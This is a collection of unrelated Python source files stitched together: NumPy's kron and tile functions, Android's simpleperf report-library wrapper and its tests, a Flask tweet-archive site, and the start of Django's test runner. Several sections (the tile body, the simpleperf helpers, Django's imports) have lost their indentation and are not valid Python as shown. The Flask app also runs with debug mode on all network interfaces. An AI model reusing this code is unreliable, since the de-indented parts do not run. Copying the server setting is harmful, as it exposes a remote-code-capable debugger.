    split : Split an array into multiple sub-arrays of equal size.
    """
    rank = _nx.ndim(ary)
    if rank < 3:
        raise ValueError('dsplit only works on arrays of 3 or more dimensions')
    return split(ary, indices_or_sections, 2)
def get_array_prepare(*args):
    """Find the __array_prepare__ wrapper with the highest priority.

    In case of ties, the leftmost argument wins. Returns None when no
    argument defines __array_prepare__.
    """
    candidates = [(getattr(arg, '__array_priority__', 0), -pos,
                   arg.__array_prepare__)
                  for pos, arg in enumerate(args)
                  if hasattr(arg, '__array_prepare__')]
    if not candidates:
        return None
    # max() on (priority, -position) picks the highest priority and, on a
    # tie, the leftmost argument; the third slot is never compared because
    # -position is unique.
    return max(candidates)[-1]
def get_array_wrap(*args):
    """Find the __array_wrap__ wrapper with the highest priority.

    In case of ties, the leftmost argument wins. Returns None when no
    argument defines __array_wrap__.
    """
    candidates = [(getattr(arg, '__array_priority__', 0), -pos,
                   arg.__array_wrap__)
                  for pos, arg in enumerate(args)
                  if hasattr(arg, '__array_wrap__')]
    if not candidates:
        return None
    # Highest (priority, -position) wins: leftmost argument on a tie.
    return max(candidates)[-1]
def _kron_dispatcher(a, b):
    # Dispatch on both operands.
    return (a, b)
@array_function_dispatch(_kron_dispatcher)
def kron(a, b):
    """
    Kronecker product of two arrays.

    Computes the Kronecker product, a composite array made of blocks of the
    second array scaled by the first.

    Parameters
    ----------
    a, b : array_like

    Returns
    -------
    out : ndarray

    See Also
    --------
    outer : The outer product

    Notes
    -----
    The function assumes that the number of dimensions of `a` and `b`
    are the same, if necessary prepending the smallest with ones.
    If ``a.shape = (r0,r1,..,rN)`` and ``b.shape = (s0,s1,...,sN)``,
    the Kronecker product has shape ``(r0*s0, r1*s1, ..., rN*SN)``.
    The elements are products of elements from `a` and `b`, organized
    explicitly by::

        kron(a,b)[k0,k1,...,kN] = a[i0,i1,...,iN] * b[j0,j1,...,jN]

    where::

        kt = it * st + jt,  t = 0,...,N

    In the common 2-D case (N=1), the block structure can be visualized::

        [[ a[0,0]*b, a[0,1]*b, ... , a[0,-1]*b ],
         [ ...                            ... ],
         [ a[-1,0]*b, a[-1,1]*b, ... , a[-1,-1]*b ]]

    Examples
    --------
    >>> np.kron([1,10,100], [5,6,7])
    array([  5,   6,   7, ..., 500, 600, 700])
    >>> np.kron([5,6,7], [1,10,100])
    array([  5,  50, 500, ...,   7,  70, 700])

    >>> np.kron(np.eye(2), np.ones((2,2)))
    array([[1., 1., 0., 0.],
           [1., 1., 0., 0.],
           [0., 0., 1., 1.],
           [0., 0., 1., 1.]])

    >>> a = np.arange(100).reshape((2,5,2,5))
    >>> b = np.arange(24).reshape((2,3,4))
    >>> c = np.kron(a,b)
    >>> c.shape
    (2, 10, 6, 20)
    >>> I = (1,3,0,2)
    >>> J = (0,2,1)
    >>> J1 = (0,) + J  # extend to ndim=4
    >>> S1 = (1,) + b.shape
    >>> K = tuple(np.array(I) * np.array(S1) + np.array(J1))
    >>> c[K] == a[I]*b[J]
    True
    """
    b = asanyarray(b)
    a = array(a, copy=False, subok=True, ndmin=b.ndim)
    ndb, nda = b.ndim, a.ndim
    if (nda == 0 or ndb == 0):
        # A scalar operand degenerates the Kronecker product to a product.
        return _nx.multiply(a, b)
    as_ = a.shape
    bs = b.shape
    # Force contiguous layouts so the reshape below is a cheap view.
    if not a.flags.contiguous:
        a = reshape(a, as_)
    if not b.flags.contiguous:
        b = reshape(b, bs)
    nd = ndb
    if (ndb != nda):
        # Pad the lower-dimensional shape with leading 1s so ranks match.
        if (ndb > nda):
            as_ = (1,)*(ndb-nda) + as_
        else:
            bs = (1,)*(nda-ndb) + bs
            nd = nda
    # outer() yields shape as_+bs with all a-axes first; each concatenate
    # pass below folds the leading a-axis into the matching b-axis,
    # producing the interleaved block layout.
    result = outer(a, b).reshape(as_+bs)
    axis = nd-1
    for _ in range(nd):
        result = concatenate(result, axis=axis)
    # Honour subclass wrapping (__array_prepare__/__array_wrap__) of inputs.
    wrapper = get_array_prepare(a, b)
    if wrapper is not None:
        result = wrapper(result)
    wrapper = get_array_wrap(a, b)
    if wrapper is not None:
        result = wrapper(result)
    return result
def _tile_dispatcher(A, reps):
    # Dispatch on both the array and the repetition spec.
    return (A, reps)
@array_function_dispatch(_tile_dispatcher)
def tile(A, reps):
"""
Construct an array by repeating A the number of times given by reps.
If `reps` has length ``d``, the result will have dimension of
``max(d, A.ndim)``.
If ``A.ndim < d``, `A` is promoted to be d-dimensional by prepending new
axes. So a shape (3,) array is promoted to (1, 3) for 2-D replication,
or shape (1, 1, 3) for 3-D replication. If this is not the desired
behavior, promote `A` to d-dimensions manually before calling this
function.
If ``A.ndim > d``, `reps` is promoted to `A`.ndim by pre-pending 1's to it.
Thus for an `A` of shape (2, 3, 4, 5), a `reps` of (2, 2) is treated as
(1, 1, 2, 2).
Note : Although tile may be used for broadcasting, it is strongly
recommended to use numpy's broadcasting operations and functions.
Parameters
----------
A : array_like
The input array.
reps : array_like
The number of repetitions of `A` along each axis.
Returns
-------
c : ndarray
The tiled output array.
See Also
--------
repeat : Repeat elements of an array.
broadcast_to : Broadcast an array to a new shape
Examples
--------
>>> a = np.array([0, 1, 2])
>>> np.tile(a, 2)
array([0, 1, 2, 0, 1, 2])
>>> np.tile(a, (2, 2))
array([[0, 1, 2, 0, 1, 2],
[0, 1, 2, 0, 1, 2]])
>>> np.tile(a, (2, 1, 2))
array([[[0, 1, 2, 0, 1, 2]],
[[0, 1, 2, 0, 1, 2]]])
>>> b = np.array([[1, 2], [3, 4]])
>>> np.tile(b, 2)
array([[1, 2, 1, 2],
[3, 4, 3, 4]])
>>> np.tile(b, (2, 1))
array([[1, 2],
[3, 4],
[1, 2],
[3, 4]])
>>> c = np.array([1,2,3,4])
>>> np.tile(c,(4,1))
array([[1, 2, 3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4]])
"""
try:
tup = tuple(reps)
except TypeError:
tup = (reps,)
d = len(tup)
if all(x == 1 for x in tup) and isinstance(A, _nx.ndarray):
# Fixes the problem that the function does not make a copy if A is a
# numpy array and the repetitions are 1 in all dimensions
return _nx.array(A, copy=True, subok=True, ndmin=d)
else:
# Note that no copy of zero-sized arrays is made. However since they
# have no data there is no risk of an inadvertent overwrite.
c = _nx.array(A, copy=False, subok=True, ndmin=d)
if (d < c.ndim):
tup = (1,)*(c.ndim-d) + tup
shape_out = tuple(s*t for s, t in zip(c.shape, tup))
n = c.size
if n > 0:
for dim_in, nrep in zip(c.shape, tup):
if nrep != 1:
c = c.reshape(-1, n).repeat(nrep, 0)
n //= dim_in
return c.reshape(shape_out)
|
|
#!/usr/bin/env python
#
# Copyright (C) 2016 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""simpleperf_report_lib.py: a python wrapper of libsimpleperf_report.so.
Used to access samples in perf.data.
"""
import ctypes as ct
import os
import subprocess
import sys
import unittest
from utils import *
def _get_native_lib():
    # Resolve the host-side shared library shipped alongside these scripts.
    return get_host_binary_path('libsimpleperf_report.so')
def _is_null(p):
return ct.cast(p, ct.c_void_p).value is None
def _char_pt(str):
if sys.version_info < (3, 0):
return str
# In python 3, str are wide strings whereas the C api expects 8 bit strings, hence we have to convert
# For now using utf-8 as the encoding.
return str.encode('utf-8')
def _char_pt_to_str(char_pt):
if sys.version_info < (3, 0):
return char_pt
return char_pt.decode('utf-8')
class SampleStruct(ct.Structure):
    """Mirror of the native sample record returned by GetNextSample()."""
    _fields_ = [('ip', ct.c_uint64),
                ('pid', ct.c_uint32),
                ('tid', ct.c_uint32),
                ('thread_comm', ct.c_char_p),
                ('time', ct.c_uint64),
                ('in_kernel', ct.c_uint32),
                ('cpu', ct.c_uint32),
                ('period', ct.c_uint64)]
class EventStruct(ct.Structure):
    """Mirror of the native event record (e.g. name = 'cpu-cycles')."""
    _fields_ = [('name', ct.c_char_p)]
class SymbolStruct(ct.Structure):
    """Mirror of the native symbol record for the current sample."""
    _fields_ = [('dso_name', ct.c_char_p),
                ('vaddr_in_file', ct.c_uint64),
                ('symbol_name', ct.c_char_p),
                ('symbol_addr', ct.c_uint64)]
class CallChainEntryStructure(ct.Structure):
    """One call-chain frame: an instruction pointer plus its symbol."""
    _fields_ = [('ip', ct.c_uint64),
                ('symbol', SymbolStruct)]
class CallChainStructure(ct.Structure):
    """A call chain: `nr` frames pointed to by `entries`."""
    _fields_ = [('nr', ct.c_uint32),
                ('entries', ct.POINTER(CallChainEntryStructure))]
# convert char_p to str for python3.
class SampleStructUsingStr(object):
    """Plain-python copy of SampleStruct whose char* field is a str.

    Used on python3, where the raw ctypes struct would expose bytes.
    """
    def __init__(self, sample):
        # Copy fields in the same order as SampleStruct declares them.
        for name in ('ip', 'pid', 'tid'):
            setattr(self, name, getattr(sample, name))
        self.thread_comm = _char_pt_to_str(sample.thread_comm)
        for name in ('time', 'in_kernel', 'cpu', 'period'):
            setattr(self, name, getattr(sample, name))
class EventStructUsingStr(object):
    """Plain-python copy of EventStruct with the name decoded to str."""
    def __init__(self, event):
        self.name = _char_pt_to_str(event.name)
class SymbolStructUsingStr(object):
    """Plain-python copy of SymbolStruct with char* fields decoded to str."""
    def __init__(self, symbol):
        self.dso_name = _char_pt_to_str(symbol.dso_name)
        self.vaddr_in_file = symbol.vaddr_in_file
        self.symbol_name = _char_pt_to_str(symbol.symbol_name)
        self.symbol_addr = symbol.symbol_addr
class CallChainEntryStructureUsingStr(object):
    """Plain-python copy of CallChainEntryStructure with str symbol fields."""
    def __init__(self, entry):
        self.ip = entry.ip
        self.symbol = SymbolStructUsingStr(entry.symbol)
class CallChainStructureUsingStr(object):
    """Plain-python copy of CallChainStructure; entries converted eagerly."""
    def __init__(self, callchain):
        self.nr = callchain.nr
        # Materialize the C entry array into python wrappers up front.
        self.entries = [CallChainEntryStructureUsingStr(callchain.entries[i])
                        for i in range(self.nr)]
class ReportLibStructure(ct.Structure):
    """Opaque handle for the native ReportLib instance (no visible fields)."""
    _fields_ = []
class ReportLib(object):
    """Python wrapper around libsimpleperf_report.so.

    Owns one native ReportLib instance and exposes its C entry points as
    methods. Call Close() to release the native instance; further calls
    afterwards raise.
    """
    def __init__(self, native_lib_path=None):
        # Default to the host binary shipped next to these scripts.
        if native_lib_path is None:
            native_lib_path = _get_native_lib()
        self._load_dependent_lib()
        self._lib = ct.CDLL(native_lib_path)
        # Bind the C entry points. restype must be set explicitly for
        # pointer-returning functions, otherwise ctypes assumes a C int.
        self._CreateReportLibFunc = self._lib.CreateReportLib
        self._CreateReportLibFunc.restype = ct.POINTER(ReportLibStructure)
        self._DestroyReportLibFunc = self._lib.DestroyReportLib
        self._SetLogSeverityFunc = self._lib.SetLogSeverity
        self._SetSymfsFunc = self._lib.SetSymfs
        self._SetRecordFileFunc = self._lib.SetRecordFile
        self._SetKallsymsFileFunc = self._lib.SetKallsymsFile
        self._ShowIpForUnknownSymbolFunc = self._lib.ShowIpForUnknownSymbol
        self._GetNextSampleFunc = self._lib.GetNextSample
        self._GetNextSampleFunc.restype = ct.POINTER(SampleStruct)
        self._GetEventOfCurrentSampleFunc = self._lib.GetEventOfCurrentSample
        self._GetEventOfCurrentSampleFunc.restype = ct.POINTER(EventStruct)
        self._GetSymbolOfCurrentSampleFunc = self._lib.GetSymbolOfCurrentSample
        self._GetSymbolOfCurrentSampleFunc.restype = ct.POINTER(SymbolStruct)
        self._GetCallChainOfCurrentSampleFunc = self._lib.GetCallChainOfCurrentSample
        self._GetCallChainOfCurrentSampleFunc.restype = ct.POINTER(
            CallChainStructure)
        self._GetBuildIdForPathFunc = self._lib.GetBuildIdForPath
        self._GetBuildIdForPathFunc.restype = ct.c_char_p
        self._instance = self._CreateReportLibFunc()
        assert(not _is_null(self._instance))
        # On python3, char* results are converted to str eagerly.
        self.convert_to_str = (sys.version_info >= (3, 0))
    def _load_dependent_lib(self):
        """Pre-load DLLs that libsimpleperf_report.dll depends on (Windows only)."""
        # As the windows dll is built with mingw we need to also find "libwinpthread-1.dll".
        # Load it before libsimpleperf_report.dll if it does exist in the same folder as this script.
        if is_windows():
            libwinpthread_path = os.path.join(get_script_dir(), "libwinpthread-1.dll")
            if os.path.exists(libwinpthread_path):
                self._libwinpthread = ct.CDLL(libwinpthread_path)
            else:
                log_fatal('%s is missing' % libwinpthread_path)
    def Close(self):
        """Destroy the native instance; safe to call more than once."""
        if self._instance is None:
            return
        self._DestroyReportLibFunc(self._instance)
        self._instance = None
    def SetLogSeverity(self, log_level='info'):
        """ Set log severity of native lib, can be verbose,debug,info,error,fatal."""
        cond = self._SetLogSeverityFunc(self.getInstance(), _char_pt(log_level))
        self._check(cond, "Failed to set log level")
    def SetSymfs(self, symfs_dir):
        """ Set directory used to find symbols."""
        cond = self._SetSymfsFunc(self.getInstance(), _char_pt(symfs_dir))
        self._check(cond, "Failed to set symbols directory")
    def SetRecordFile(self, record_file):
        """ Set the path of record file, like perf.data."""
        cond = self._SetRecordFileFunc(self.getInstance(), _char_pt(record_file))
        self._check(cond, "Failed to set record file")
    def ShowIpForUnknownSymbol(self):
        # Report raw instruction pointers for samples with no resolved symbol.
        self._ShowIpForUnknownSymbolFunc(self.getInstance())
    def SetKallsymsFile(self, kallsym_file):
        """ Set the file path to a copy of the /proc/kallsyms file (for off device decoding) """
        cond = self._SetKallsymsFileFunc(self.getInstance(), _char_pt(kallsym_file))
        self._check(cond, "Failed to set kallsyms file")
    def GetNextSample(self):
        """Advance to the next sample; returns None when exhausted."""
        sample = self._GetNextSampleFunc(self.getInstance())
        if _is_null(sample):
            return None
        if self.convert_to_str:
            return SampleStructUsingStr(sample[0])
        return sample[0]
    def GetEventOfCurrentSample(self):
        """Return the event of the sample last returned by GetNextSample()."""
        event = self._GetEventOfCurrentSampleFunc(self.getInstance())
        assert(not _is_null(event))
        if self.convert_to_str:
            return EventStructUsingStr(event[0])
        return event[0]
    def GetSymbolOfCurrentSample(self):
        """Return the symbol info of the current sample."""
        symbol = self._GetSymbolOfCurrentSampleFunc(self.getInstance())
        assert(not _is_null(symbol))
        if self.convert_to_str:
            return SymbolStructUsingStr(symbol[0])
        return symbol[0]
    def GetCallChainOfCurrentSample(self):
        """Return the call chain of the current sample."""
        callchain = self._GetCallChainOfCurrentSampleFunc(self.getInstance())
        assert(not _is_null(callchain))
        if self.convert_to_str:
            return CallChainStructureUsingStr(callchain[0])
        return callchain[0]
    def GetBuildIdForPath(self, path):
        """Return the build id recorded in perf.data for the binary at `path`."""
        build_id = self._GetBuildIdForPathFunc(self.getInstance(), _char_pt(path))
        assert(not _is_null(build_id))
        return _char_pt_to_str(build_id)
    def getInstance(self):
        # Guard against use-after-Close.
        if self._instance is None:
            raise Exception("Instance is Closed")
        return self._instance
    def _check(self, cond, failmsg):
        # Translate a falsy C return value into a python exception.
        if not cond:
            raise Exception(failmsg)
class TestReportLib(unittest.TestCase):
    """Smoke tests for ReportLib against testdata/perf_with_symbols.data."""
    def setUp(self):
        self.perf_data_path = os.path.join(os.path.dirname(get_script_dir()),
                                           'testdata', 'perf_with_symbols.data')
        if not os.path.isfile(self.perf_data_path):
            raise Exception("can't find perf_data at %s" % self.perf_data_path)
        self.report_lib = ReportLib()
        self.report_lib.SetRecordFile(self.perf_data_path)
    def tearDown(self):
        # Release the native instance between tests.
        self.report_lib.Close()
    def test_build_id(self):
        """GetBuildIdForPath returns the known build id for /data/t2."""
        build_id = self.report_lib.GetBuildIdForPath('/data/t2')
        self.assertEqual(build_id, '0x70f1fe24500fc8b0d9eb477199ca1ca21acca4de')
    def test_symbol_addr(self):
        """The symbol address of func2 is resolved from the symbol table."""
        found_func2 = False
        while True:
            sample = self.report_lib.GetNextSample()
            if sample is None:
                break
            symbol = self.report_lib.GetSymbolOfCurrentSample()
            if symbol.symbol_name == 'func2(int, int)':
                found_func2 = True
                self.assertEqual(symbol.symbol_addr, 0x4004ed)
        self.assertTrue(found_func2)
    def test_sample(self):
        """A known sample's fields match the values recorded in perf.data."""
        found_sample = False
        while True:
            sample = self.report_lib.GetNextSample()
            if sample is None:
                break
            if sample.ip == 0x4004ff and sample.time == 7637889424953:
                found_sample = True
                self.assertEqual(sample.pid, 15926)
                self.assertEqual(sample.tid, 15926)
                self.assertEqual(sample.thread_comm, 't2')
                self.assertEqual(sample.cpu, 5)
                self.assertEqual(sample.period, 694614)
                event = self.report_lib.GetEventOfCurrentSample()
                self.assertEqual(event.name, 'cpu-cycles')
                callchain = self.report_lib.GetCallChainOfCurrentSample()
                self.assertEqual(callchain.nr, 0)
        self.assertTrue(found_sample)
def main():
    """Run the test suite under both python2 and python3.

    Without '--test-one' this re-invokes the script once per interpreter;
    with it, the child process runs unittest directly.
    """
    if len(sys.argv) > 1 and sys.argv[1] == '--test-one':
        del sys.argv[1]
        sys.exit(unittest.main())
    subprocess.check_call(['python', os.path.realpath(__file__), '--test-one'])
    subprocess.check_call(['python3', os.path.realpath(__file__), '--test-one'])


if __name__ == '__main__':
    main()
|
|
# -*- coding: utf-8 -*-
import os, glob, sys, json

# Resolve the directory this script lives in; fall back to the current
# working directory when __file__ is not defined (e.g. interactive use).
workdir = os.curdir
try:
    workdir = os.path.dirname(__file__)
except: pass  # NOTE(review): bare except silently swallows all errors

from flask import Flask
from flaskext.genshi import Genshi, render_template
from genshi.template import MarkupTemplate
from genshi.template import TemplateLoader
from genshi import Stream
from genshi.input import XML
from genshi.core import QName
import os.path
import logging
import config
import datetime, dateutil.parser
import pytz
import re

# Flask application object and its Genshi templating integration.
app = Flask(__name__)
genshi = Genshi(app)
def flatten(lst):
    """Recursively flatten nested lists, yielding leaf elements in order.

    Only lists are descended into; tuples, strings and other iterables are
    yielded unchanged, matching the original behaviour.
    """
    for elem in lst:
        # isinstance() is the idiomatic type check (was: type(elem) in (list,));
        # it additionally accepts list subclasses.
        if isinstance(elem, list):
            for item in flatten(elem):
                yield item
        else:
            yield elem
def _media_has_photo(container, key):
    """Return True if container[key]['media'] lists at least one photo entry."""
    entities = container.get(key) or {}
    media = entities.get('media') or []
    return any(m.get('type') == 'photo' for m in media)


def has_photo(tweet):
    """Return True if the tweet (or the status it retweets) carries a photo.

    Checks, in order: the tweet's own 'entities'; then the retweeted
    status's 'entities' and 'extended_entities'; then the retweeted
    status's 'extended_tweet' entity blocks. Note that the top-level
    tweet's own 'extended_entities' is deliberately NOT checked, matching
    the original behaviour.

    Replaces the Python-2-only dict.has_key() calls (removed in Python 3)
    and collapses five near-identical boolean chains into one helper.
    """
    if _media_has_photo(tweet, 'entities'):
        return True
    retweet = tweet.get('retweeted_status')
    if not retweet:
        return False
    if _media_has_photo(retweet, 'entities') or _media_has_photo(retweet, 'extended_entities'):
        return True
    extended = retweet.get('extended_tweet') or {}
    return (_media_has_photo(extended, 'entities')
            or _media_has_photo(extended, 'extended_entities'))
def update_index():
    """Incrementally (re)build the global tweet index on disk.

    The index maps either year->month->day->[id_str] (when
    config.paginate_by_day is set) or year->ISO-week->[id_str].
    Only archive directories newer than idx['last_seen'] are rescanned.
    Returns the index dict. NOTE(review): Python 2 only (dict.has_key).
    """
    index_file = os.path.join(config.archive_dir, 'archiveindex.json')
    idx = {
        'last_seen': '0',
        'tweets': {},
    }
    # Load the previous index if present; start fresh on any error.
    try:
        with open(index_file, 'r') as fp:
            idx = json.load(fp)
    except:
        pass
    # Date-named archive directories not yet fully processed.
    archive_dirs = sorted([ f for f in glob.glob(os.path.join(config.archive_dir, '[0-9]*')) if os.path.isdir(f) and os.path.basename(f) >= idx['last_seen'] ])
    for dir in archive_dirs:
        for jsonfile in sorted(glob.glob(os.path.join(dir, '*.json'))):
            with open(jsonfile) as f:
                tweet = json.load(f)
            if ((not config.show_only_photos_in_archive) or has_photo(tweet) ):
                if not any(word in tweet['text'].lower() for word in config.spamfilter_word_blacklist): # Blacklisted words?
                    # Normalize the tweet timestamp to Europe/Berlin local time.
                    tweettime = dateutil.parser.parse(tweet['created_at']).astimezone(pytz.timezone('Europe/Berlin'))
                    if config.paginate_by_day:
                        year = str(tweettime.year)
                        month = "%02d" % tweettime.month
                        day = "%02d" % tweettime.day
                        if not idx['tweets'].has_key(year):
                            idx['tweets'][year] = {}
                        if not idx['tweets'][year].has_key(month):
                            idx['tweets'][year][month] = {}
                        if not idx['tweets'][year][month].has_key(day):
                            idx['tweets'][year][month][day] = []
                        if not tweet['id_str'] in idx['tweets'][year][month][day]:
                            idx['tweets'][year][month][day].append(tweet['id_str'])
                    else:
                        (year, kw, day) = [ str(x) for x in tweettime.isocalendar() ]
                        # Can we put the tweet into the correct KW by checking whether the previous, next or current KW is mentioned in the tweet?
                        maxdelta = datetime.timedelta(days=6)
                        # Last match wins: current week is checked last, so it
                        # takes priority over the previous/next weeks.
                        for (y,k,d) in [ ts.isocalendar() for ts in (tweettime - maxdelta, tweettime + maxdelta, tweettime)]:
                            if re.search(r"(^|\D)%d(\D|$)" % k, tweet['text']):
                                kw = str(k)
                        if not idx['tweets'].has_key(year):
                            idx['tweets'][year] = {}
                        if not idx['tweets'][year].has_key(kw):
                            idx['tweets'][year][kw] = []
                        if not tweet['id_str'] in idx['tweets'][year][kw]:
                            idx['tweets'][year][kw].append(tweet['id_str'])
    # Remember the newest directory scanned, then atomically replace the
    # index file via write-to-temp + rename.
    idx['last_seen'] = os.path.basename(archive_dirs[-1])
    with open(index_file + '.new', 'w') as fp:
        json.dump(idx, fp)
    if os.path.isfile(index_file + '.new'):
        os.rename(index_file + '.new', index_file)
    return idx
def insensitive(pattern):
    """Build a case-insensitive glob pattern: each letter becomes [xX]."""
    pieces = []
    for ch in pattern:
        if ch.isalpha():
            pieces.append('[%s%s]' % (ch.lower(), ch.upper()))
        else:
            pieces.append(ch)
    return ''.join(pieces)
def update_user_index(screenname):
    """Incrementally build the per-user index of tweet id strings.

    Matches tweets authored by (or retweeting) `screenname`, applying the
    photo filter and word blacklist. Returns {'last_seen': ..., 'tweets':
    [id_str, ...]}. NOTE(review): Python 2 only (dict.has_key).
    """
    user_archive_dir = os.path.join(config.archive_dir, 'users')
    try:
        os.makedirs(user_archive_dir)
    except: pass  # directory may already exist
    index_file = os.path.join(user_archive_dir, '%s.json' % screenname)
    idx = {
        'last_seen': '0',
        'tweets': [],
    }
    # Load the previous index if present; start fresh on any error.
    try:
        with open(index_file, 'r') as fp:
            idx = json.load(fp)
    except:
        pass
    # Date-named archive directories not yet fully processed.
    archive_dirs = sorted([ f for f in glob.glob(os.path.join(config.archive_dir, '[0-9]*')) if os.path.isdir(f) and os.path.basename(f) >= idx['last_seen'] ])
    for dir in archive_dirs:
        # Per-tweet files are named '<id>-<screenname>.json'.
        for jsonfile in sorted(glob.glob(os.path.join(dir, '*-'+insensitive(screenname)+'.json'))):
            with open(jsonfile) as f:
                tweet = json.load(f)
            if (not config.show_only_photos_in_archive) or has_photo(tweet):
                if tweet['user']['screen_name'].lower() == screenname or (tweet.has_key('retweeted_status') and tweet['retweeted_status']['user']['screen_name'].lower() == screenname):
                    if not any(word in tweet['text'].lower() for word in config.spamfilter_word_blacklist): # Blacklisted words?
                        if not tweet['id_str'] in idx['tweets']:
                            idx['tweets'].append(tweet['id_str'])
    if len(idx['tweets']) > 0:
        idx['last_seen'] = os.path.basename(archive_dirs[-1])
    # Atomically replace the index file via write-to-temp + rename.
    with open(index_file + '.new', 'w') as fp:
        json.dump(idx, fp)
    if os.path.isfile(index_file + '.new'):
        os.rename(index_file + '.new', index_file)
    return idx
def update_user_tweetindex(screenname):
    """Incrementally build the per-user index of FULL photo tweets.

    Unlike update_user_index(), idx['tweets'] stores complete tweet dicts
    (used by the collage view), not id strings. Returns the index dict.
    """
    user_archive_dir = os.path.join(config.archive_dir, 'users')
    try:
        os.makedirs(user_archive_dir)
    except:
        pass  # directory may already exist
    index_file = os.path.join(user_archive_dir, '%s.full.json' % screenname)
    idx = {
        'last_seen': '0',
        'tweets': [],
    }
    # Load the previous index if present; start fresh on any error.
    try:
        with open(index_file, 'r') as fp:
            idx = json.load(fp)
    except:
        pass
    # BUG FIX: idx['tweets'] holds full tweet dicts, but the old code tested
    # `tweet['id_str'] not in idx['tweets']` (a string against dicts), which
    # never matched, so every rescan appended duplicates. Track known ids
    # separately. Also: dict.has_key() replaced with `in` (Python 3 compat).
    known_ids = set(t['id_str'] for t in idx['tweets'])
    archive_dirs = sorted([ f for f in glob.glob(os.path.join(config.archive_dir, '[0-9]*')) if os.path.isdir(f) and os.path.basename(f) >= idx['last_seen'] ])
    for dir in archive_dirs:
        # Per-tweet files are named '<id>-<screenname>.json'.
        for jsonfile in sorted(glob.glob(os.path.join(dir, '*-'+insensitive(screenname)+'.json'))):
            with open(jsonfile) as f:
                tweet = json.load(f)
            if has_photo(tweet):
                if tweet['user']['screen_name'].lower() == screenname or ('retweeted_status' in tweet and tweet['retweeted_status']['user']['screen_name'].lower() == screenname):
                    if tweet['id_str'] not in known_ids:
                        known_ids.add(tweet['id_str'])
                        idx['tweets'].append(tweet)
    if len(idx['tweets']) > 0:
        idx['last_seen'] = os.path.basename(archive_dirs[-1])
    # Atomically replace the index file via write-to-temp + rename.
    with open(index_file + '.new', 'w') as fp:
        json.dump(idx, fp)
    if os.path.isfile(index_file + '.new'):
        os.rename(index_file + '.new', index_file)
    return idx
@app.route('/user/<screenname>')
def user(screenname):
    """Render the timeline page for a single user's archived tweets."""
    # Strip anything that isn't a valid (lower-cased) screen-name character.
    screenname = re.sub(r'[^a-z0-9_]+', '', screenname.lower())
    idx = update_user_index(screenname)
    context = {
        'screenname': screenname,
        'title': config.track,
        'tweetids': json.dumps(sorted(idx['tweets'], reverse=False)),
    }
    return render_template('index.html', context)
@app.route('/collage/<screenname>')
def collage(screenname):
    # Render a photo-collage page for one user from the full-tweet index.
    # Strip anything that isn't a valid (lower-cased) screen-name character.
    screenname = re.sub(r'[^a-z0-9_]+', '', screenname.lower())
    idx = update_user_tweetindex(screenname)
    # NOTE(review): idx['tweets'] holds full tweet dicts here, so sorted()
    # compares dicts — only defined (arbitrarily) under Python 2; confirm
    # the intended ordering.
    return render_template(
        'collage.html',
        {
            'screenname': screenname,
            'title': config.track,
            'tweetids': json.dumps(sorted(idx['tweets'])),
        });
@app.route('/')
@app.route('/<year>/<kw>')
def index(year=None, kw=None):
    # Front page: tweets grouped by ISO calendar week; delegates to the
    # per-day view when day pagination is configured.
    if config.paginate_by_day:
        return index_days()
    tweetids = []
    idx = {}
    # Sanitize URL parameters; anything non-numeric falls back to "now".
    try:
        year = str(int(year))
        kw = str(int(kw))
    except:
        year = None
        kw = None
    if year is None:
        (year, kw, day) = [ str(x) for x in datetime.datetime.now().isocalendar() ]
    # Missing year/week entries simply leave the tweet list empty.
    try:
        idx = update_index()
        tweetids = list(idx['tweets'][year][kw])
    except Exception as e:
        print e
    return render_template(
        'index.html',
        { 'year':year,
          'kw':kw,
          'title': config.track,
          # (year, week) pairs for the navigation bar, sorted by week number.
          'navigation': sorted(set(flatten([ [ (y, k) for k in idx['tweets'][y].keys() ] for y in idx['tweets'].keys() ])), key=lambda x: int(x[1])),
          'tweetids': json.dumps(tweetids),
        });
@app.route('/<year>/<month>/<day>')
def index_days(year=None, month=None, day=None):
    # Per-day view: tweets grouped by year/month/day.
    tweetids = []
    idx = {}
    # Sanitize URL parameters; anything non-numeric falls back to "today".
    try:
        year = str(int(year))
        month = "%02d" % int(month)
        day = "%02d" % int(day)
    except:
        year = None
        month = None
        day = None
    if year is None:
        now = datetime.datetime.now()
        year = str(now.year)
        month = "%02d" % now.month
        day = "%02d" % now.day
    # Missing date entries simply leave the tweet list empty.
    try:
        idx = update_index()
        tweetids = list(idx['tweets'][year][month][day])
    except Exception as e:
        print e
    return render_template(
        'index.html',
        { 'year':year,
          'month': month,
          'day': day,
          'title': config.track,
          # (year, month, day) triples for the navigation bar.
          'navigation': sorted(flatten([ [ [ (y, m, d) for d in idx['tweets'][y][m].keys() ] for m in idx['tweets'][y].keys() ] for y in idx['tweets'].keys() ])),
          'tweetids': json.dumps(tweetids),
        });
# Run the Flask development server when executed directly.
if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=True)
|
|
#!/usr/bin/env python
import argparse
import atexit
import copy
import os
import shutil
import socket
import subprocess
import sys
import tempfile
import warnings
try:
import django
except ImportError as e:
raise RuntimeError(
'Django module not found, reference tests/README.rst for instructions.'
) from e
else:
from django.apps import apps
from django.conf import settings
from django.db import connection, connections
from django.test import TestCase, TransactionTestCase
from django.test.runner import default_test_processes
from django.test.selenium import SeleniumTestCaseBase
from django.test.utils import get_runner
from django.utils.deprecation import (
RemovedInDjango40Warning, RemovedInDjango41Warning,
)
from django.utils.log import DEFAULT_LOGGING
from django.utils.version import PY37
try:
    import MySQLdb
except ImportError:
    pass
else:
    # Ignore informational warnings from QuerySet.explain().
    warnings.filterwarnings('ignore', r'\(1003, *', category=MySQLdb.Warning)

# Make deprecation warnings errors to ensure no usage of deprecated features.
warnings.simplefilter("error", RemovedInDjango40Warning)
warnings.simplefilter('error', RemovedInDjango41Warning)
# Make resource and runtime warning errors to ensure no usage of error prone
# patterns.
warnings.simplefilter("error", ResourceWarning)
warnings.simplefilter("error", RuntimeWarning)
# Ignore known warnings in test dependencies.
warnings.filterwarnings("ignore", "'U' mode is deprecated", DeprecationWarning, module='docutils.io')

RUNTESTS_DIR = os.path.abspath(os.path.dirname(__file__))
TEMPLATE_DIR = os.path.join(RUNTESTS_DIR, 'templates')

